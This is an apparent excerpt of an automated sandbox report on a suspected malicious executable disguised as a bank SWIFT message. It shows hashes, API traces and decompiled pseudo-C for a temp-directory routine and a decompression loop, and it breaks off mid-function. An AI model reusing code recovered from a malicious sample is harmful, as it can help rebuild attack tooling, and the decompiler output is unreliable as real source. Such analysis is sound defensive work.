                                  • Opcode ID: 565394f193aa149aca92c3ad0f9dd305ea90bf2e1cecae38531d5b0fd8eb5121
                                  • Instruction ID: 5eaacd06ab4ddf1cbd823b1e62e96466b2f2074a3821a2ebee469afe657994a3
                                  • Opcode Fuzzy Hash: 565394f193aa149aca92c3ad0f9dd305ea90bf2e1cecae38531d5b0fd8eb5121
                                  • Instruction Fuzzy Hash: 4F21FC759102489BEB14CFA1CC51BEE7379EF54700F10906CE605E72D0E7799B01CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E004031F1(void* __eflags) {
                                  				void* _t2;
                                  				void* _t5;
                                  				CHAR* _t6;
                                  
                                  				_t6 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
                                  				E00405CE3(_t6);
                                  				_t2 = E004055E5(_t6);
                                  				if(_t2 != 0) {
                                  					E00405578(_t6);
                                  					CreateDirectoryA(_t6, 0); // executed
                                  					_t5 = E0040578B("1033", _t6); // executed
                                  					return _t5;
                                  				} else {
                                  					return _t2;
                                  				}
                                  			}






                                  0x004031f2
                                  0x004031f8
                                  0x004031fe
                                  0x00403205
                                  0x0040320a
                                  0x00403212
                                  0x0040321e
                                  0x00403224
                                  0x00403208
                                  0x00403208
                                  0x00403208

                                  APIs
                                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,C:\Users\user~1\AppData\Local\Temp\,00000000,004031FD,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                                  • CreateDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Char$Next$CreateDirectoryPrev
                                  • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                  • API String ID: 4115351271-3049706366
                                  • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                                  • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                                  • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                                  • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 618 406481-406487 619 406489-40648b 618->619 620 40648c-4064aa 618->620 619->620 621 4066b8-4066cd 620->621 622 40677d-40678a 620->622 624 4066e7-4066fd 621->624 625 4066cf-4066e5 621->625 623 4067b4-4067b8 622->623 627 406818-40682b 623->627 628 4067ba-4067db 623->628 626 406700-406707 624->626 625->626 629 406709-40670d 626->629 630 40672e 626->630 631 406734-40673a 627->631 632 4067f4-406807 628->632 633 4067dd-4067f2 628->633 634 406713-40672b 629->634 635 4068bc-4068c6 629->635 630->631 641 4068e7 631->641 642 405edf 631->642 636 40680a-406811 632->636 633->636 634->630 638 4068d2-4068e5 635->638 639 4067b1 636->639 640 406813 636->640 643 4068ea-4068ee 638->643 639->623 652 406796-4067ae 640->652 653 4068c8 640->653 641->643 645 405ee6-405eea 642->645 646 406026-406047 642->646 647 405f8b-405f8f 642->647 648 405ffb-405fff 642->648 645->638 649 405ef0-405efd 645->649 646->621 654 405f95-405fae 647->654 655 40683b-406845 647->655 650 406005-406019 648->650 651 40684a-406854 648->651 649->641 656 405f03-405f49 649->656 657 40601c-406024 650->657 651->638 652->639 653->638 658 405fb1-405fb5 654->658 655->638 659 405f71-405f73 656->659 660 405f4b-405f4f 656->660 657->646 657->648 658->647 661 405fb7-405fbd 658->661 664 405f81-405f89 659->664 665 405f75-405f7f 659->665 662 405f51-405f54 GlobalFree 660->662 663 405f5a-405f68 GlobalAlloc 660->663 666 405fe7-405ff9 661->666 667 405fbf-405fc6 661->667 662->663 663->641 668 405f6e 663->668 664->658 665->664 665->665 666->657 669 405fd1-405fe1 GlobalAlloc 667->669 670 405fc8-405fcb GlobalFree 667->670 668->659 669->641 669->666 670->669
                                  C-Code - Quality: 99%
                                  			E00406481() {
                                  				signed int _t530;
                                  				void _t537;
                                  				signed int _t538;
                                  				signed int _t539;
                                  				unsigned short _t569;
                                  				signed int _t579;
                                  				signed int _t607;
                                  				void* _t627;
                                  				signed int _t628;
                                  				signed int _t635;
                                  				signed int* _t643;
                                  				void* _t644;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					_t530 =  *(_t644 - 0x30);
                                  					if(_t530 >= 4) {
                                  					}
                                  					 *(_t644 - 0x40) = 6;
                                  					 *(_t644 - 0x7c) = 0x19;
                                  					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                  					while(1) {
                                  						L145:
                                  						 *(_t644 - 0x50) = 1;
                                  						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                  						while(1) {
                                  							L149:
                                  							if( *(_t644 - 0x48) <= 0) {
                                  								goto L155;
                                  							}
                                  							L150:
                                  							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                  							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                  							 *(_t644 - 0x54) = _t643;
                                  							_t569 =  *_t643;
                                  							_t635 = _t569 & 0x0000ffff;
                                  							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                  							if( *(_t644 - 0xc) >= _t607) {
                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                  								_t628 = _t627 + 1;
                                  								 *_t643 = _t569 - (_t569 >> 5);
                                  								 *(_t644 - 0x50) = _t628;
                                  							} else {
                                  								 *(_t644 - 0x10) = _t607;
                                  								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                  								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                  							}
                                  							if( *(_t644 - 0x10) >= 0x1000000) {
                                  								L148:
                                  								_t487 = _t644 - 0x48;
                                  								 *_t487 =  *(_t644 - 0x48) - 1;
                                  								L149:
                                  								if( *(_t644 - 0x48) <= 0) {
                                  									goto L155;
                                  								}
                                  								goto L150;
                                  							} else {
                                  								L154:
                                  								L146:
                                  								if( *(_t644 - 0x6c) == 0) {
                                  									L169:
                                  									 *(_t644 - 0x88) = 0x18;
                                  									L170:
                                  									_t579 = 0x22;
                                  									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                  									_t539 = 0;
                                  									L172:
                                  									return _t539;
                                  								}
                                  								L147:
                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                  								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  								_t484 = _t644 - 0x70;
                                  								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                  								goto L148;
                                  							}
                                  							L155:
                                  							_t537 =  *(_t644 - 0x7c);
                                  							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                  							while(1) {
                                  								L140:
                                  								 *(_t644 - 0x88) = _t537;
                                  								while(1) {
                                  									L1:
                                  									_t538 =  *(_t644 - 0x88);
                                  									if(_t538 > 0x1c) {
                                  										break;
                                  									}
                                  									L2:
                                  									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                                  										case 0:
                                  											L3:
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												goto L170;
                                  											}
                                  											L4:
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                  											_t538 =  *( *(_t644 - 0x70));
                                  											if(_t538 > 0xe1) {
                                  												goto L171;
                                  											}
                                  											L5:
                                  											_t542 = _t538 & 0x000000ff;
                                  											_push(0x2d);
                                  											asm("cdq");
                                  											_pop(_t581);
                                  											_push(9);
                                  											_pop(_t582);
                                  											_t638 = _t542 / _t581;
                                  											_t544 = _t542 % _t581 & 0x000000ff;
                                  											asm("cdq");
                                  											_t633 = _t544 % _t582 & 0x000000ff;
                                  											 *(_t644 - 0x3c) = _t633;
                                  											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                  											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                  											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                  											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                  												L10:
                                  												if(_t641 == 0) {
                                  													L12:
                                  													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                  													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                  													goto L15;
                                  												} else {
                                  													goto L11;
                                  												}
                                  												do {
                                  													L11:
                                  													_t641 = _t641 - 1;
                                  													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                  												} while (_t641 != 0);
                                  												goto L12;
                                  											}
                                  											L6:
                                  											if( *(_t644 - 4) != 0) {
                                  												GlobalFree( *(_t644 - 4));
                                  											}
                                  											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                  											 *(_t644 - 4) = _t538;
                                  											if(_t538 == 0) {
                                  												goto L171;
                                  											} else {
                                  												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                  												goto L10;
                                  											}
                                  										case 1:
                                  											L13:
                                  											__eflags =  *(_t644 - 0x6c);
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												L157:
                                  												 *(_t644 - 0x88) = 1;
                                  												goto L170;
                                  											}
                                  											L14:
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                  											_t45 = _t644 - 0x48;
                                  											 *_t45 =  *(_t644 - 0x48) + 1;
                                  											__eflags =  *_t45;
                                  											L15:
                                  											if( *(_t644 - 0x48) < 4) {
                                  												goto L13;
                                  											}
                                  											L16:
                                  											_t550 =  *(_t644 - 0x40);
                                  											if(_t550 ==  *(_t644 - 0x74)) {
                                  												L20:
                                  												 *(_t644 - 0x48) = 5;
                                  												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                  												goto L23;
                                  											}
                                  											L17:
                                  											 *(_t644 - 0x74) = _t550;
                                  											if( *(_t644 - 8) != 0) {
                                  												GlobalFree( *(_t644 - 8));
                                  											}
                                  											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                  											 *(_t644 - 8) = _t538;
                                  											if(_t538 == 0) {
                                  												goto L171;
                                  											} else {
                                  												goto L20;
                                  											}
                                  										case 2:
                                  											L24:
                                  											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                  											 *(_t644 - 0x84) = 6;
                                  											 *(_t644 - 0x4c) = _t557;
                                  											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                  											goto L132;
                                  										case 3:
                                  											L21:
                                  											__eflags =  *(_t644 - 0x6c);
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												L158:
                                  												 *(_t644 - 0x88) = 3;
                                  												goto L170;
                                  											}
                                  											L22:
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											_t67 = _t644 - 0x70;
                                  											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                  											__eflags =  *_t67;
                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                  											L23:
                                  											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                  											if( *(_t644 - 0x48) != 0) {
                                  												goto L21;
                                  											}
                                  											goto L24;
                                  										case 4:
                                  											L133:
                                  											_t559 =  *_t642;
                                  											_t626 = _t559 & 0x0000ffff;
                                  											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                  											if( *(_t644 - 0xc) >= _t596) {
                                  												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                  												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                  												 *(_t644 - 0x40) = 1;
                                  												_t560 = _t559 - (_t559 >> 5);
                                  												__eflags = _t560;
                                  												 *_t642 = _t560;
                                  											} else {
                                  												 *(_t644 - 0x10) = _t596;
                                  												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                  												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                  											}
                                  											if( *(_t644 - 0x10) >= 0x1000000) {
                                  												goto L139;
                                  											} else {
                                  												goto L137;
                                  											}
                                  										case 5:
                                  											L137:
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												L168:
                                  												 *(_t644 - 0x88) = 5;
                                  												goto L170;
                                  											}
                                  											L138:
                                  											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                  											L139:
                                  											_t537 =  *(_t644 - 0x84);
                                  											L140:
                                  											 *(_t644 - 0x88) = _t537;
                                  											goto L1;
                                  										case 6:
                                  											L25:
                                  											__edx = 0;
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												L36:
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) = 1;
                                  												 *(__ebp - 0x84) = 7;
                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											L26:
                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  											__esi =  *(__ebp - 0x60);
                                  											__cl = 8;
                                  											__cl = 8 -  *(__ebp - 0x3c);
                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  											__ecx =  *(__ebp - 0x3c);
                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  											__ecx =  *(__ebp - 4);
                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  											__eflags =  *(__ebp - 0x38) - 4;
                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											if( *(__ebp - 0x38) >= 4) {
                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                  												if( *(__ebp - 0x38) >= 0xa) {
                                  													_t98 = __ebp - 0x38;
                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                  													__eflags =  *_t98;
                                  												} else {
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  												}
                                  											} else {
                                  												 *(__ebp - 0x38) = 0;
                                  											}
                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                  											if( *(__ebp - 0x34) == __edx) {
                                  												L35:
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												goto L61;
                                  											} else {
                                  												L32:
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__ecx =  *(__ebp - 8);
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  												goto L41;
                                  											}
                                  										case 7:
                                  											L66:
                                  											__eflags =  *(__ebp - 0x40) - 1;
                                  											if( *(__ebp - 0x40) != 1) {
                                  												L68:
                                  												__eax =  *(__ebp - 0x24);
                                  												 *(__ebp - 0x80) = 0x16;
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												__eax =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  												__eax =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 4) + 0x664;
                                  												__eflags = __eax;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L69;
                                  											}
                                  											L67:
                                  											__eax =  *(__ebp - 4);
                                  											__ecx =  *(__ebp - 0x38);
                                  											 *(__ebp - 0x84) = 8;
                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  											goto L132;
                                  										case 8:
                                  											L70:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xa;
                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  											} else {
                                  												__eax =  *(__ebp - 0x38);
                                  												__ecx =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                  												 *(__ebp - 0x84) = 9;
                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  											}
                                  											goto L132;
                                  										case 9:
                                  											L73:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												goto L90;
                                  											}
                                  											L74:
                                  											__eflags =  *(__ebp - 0x60);
                                  											if( *(__ebp - 0x60) == 0) {
                                  												goto L171;
                                  											}
                                  											L75:
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                  											__eflags = _t259;
                                  											0 | _t259 = _t259 + _t259 + 9;
                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                  											goto L76;
                                  										case 0xa:
                                  											L82:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												L84:
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xb;
                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											L83:
                                  											__eax =  *(__ebp - 0x28);
                                  											goto L89;
                                  										case 0xb:
                                  											L85:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__ecx =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x20);
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  											} else {
                                  												__eax =  *(__ebp - 0x24);
                                  											}
                                  											__ecx =  *(__ebp - 0x28);
                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  											L89:
                                  											__ecx =  *(__ebp - 0x2c);
                                  											 *(__ebp - 0x2c) = __eax;
                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  											L90:
                                  											__eax =  *(__ebp - 4);
                                  											 *(__ebp - 0x80) = 0x15;
                                  											__eax =  *(__ebp - 4) + 0xa68;
                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  											goto L69;
                                  										case 0xc:
                                  											L99:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L164:
                                  												 *(__ebp - 0x88) = 0xc;
                                  												goto L170;
                                  											}
                                  											L100:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t334 = __ebp - 0x70;
                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t334;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											__eax =  *(__ebp - 0x2c);
                                  											goto L101;
                                  										case 0xd:
                                  											L37:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L159:
                                  												 *(__ebp - 0x88) = 0xd;
                                  												goto L170;
                                  											}
                                  											L38:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t122 = __ebp - 0x70;
                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t122;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L39:
                                  											__eax =  *(__ebp - 0x40);
                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  												goto L48;
                                  											}
                                  											L40:
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												goto L54;
                                  											}
                                  											L41:
                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  											 *(__ebp - 0x48) = __eax;
                                  											__eax = __eax + 1;
                                  											__eax = __eax << 8;
                                  											__eax = __eax + __ebx;
                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edx = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												 *(__ebp - 0x40) = 1;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												__ebx = __ebx + __ebx + 1;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edx;
                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L39;
                                  											} else {
                                  												L45:
                                  												goto L37;
                                  											}
                                  										case 0xe:
                                  											L46:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L160:
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											L47:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t156 = __ebp - 0x70;
                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t156;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											while(1) {
                                  												L48:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													break;
                                  												}
                                  												L49:
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t170 = __edx + 1; // 0x1
                                  													__ebx = _t170;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
